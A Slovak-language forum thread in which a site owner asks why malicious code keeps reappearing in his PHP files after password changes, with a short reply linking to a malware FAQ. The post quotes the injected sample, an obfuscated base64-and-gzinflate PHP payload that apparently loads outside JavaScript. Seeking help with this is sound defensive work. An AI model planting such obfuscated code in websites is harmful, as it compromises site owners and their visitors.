Autor Zpráva
Meldo
Profil
Zdravim,

poslednu dobu neuspesne riesim problem s utokmi na moj web. Nejakym sposobom sa utocnikovy podarilo umiestnit priamo do PHP suborov svoj skodlivy kod. Po objaveni som vychadzal z toho, ze utocnik musel poznat pristupove udaje k FTP a tam pozmenil subory. Avsak toto sa deje aj po zmene vsetkych moznych hesiel.
Ako sa tam teda mohol skodlivy kod dostat? Je to problem zabezpecenia serveru? Alebo su nejake techniky na hacknutie priamo zdrojakov? Predpokladam ze pripadna zranitelnost cez sql injection alebo xss na toto nema dosah.

Ide o stranku www.vyhodykariet.sk

Vlozeny skodlivy kod: echo(gzinflate(base64_decode("TczBDYMwDEDRVaIMYN8RcGCFigFcaoWEAsF2ENm+lbhwfV/6rU4SszmrmTtvfBkmOulW7760hULhn56qMnV+NssN4lnn/VMXksgGuuBrHNJRWCqUCFn2IKz6JoE1bpDUu77F+9P/AA==")));
Tento kod nasledne generuje nejaky javascript ktory sa taha z roznych stranok....


Dik za akukolvek odpoved.
Chamurappi
Profil
Reaguji na Melda:
Máte na webu virus — co s tím?

Vaše odpověď

Mohlo by se hodit

Příspěvky nesouvisející s webem budou odstraněny.

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: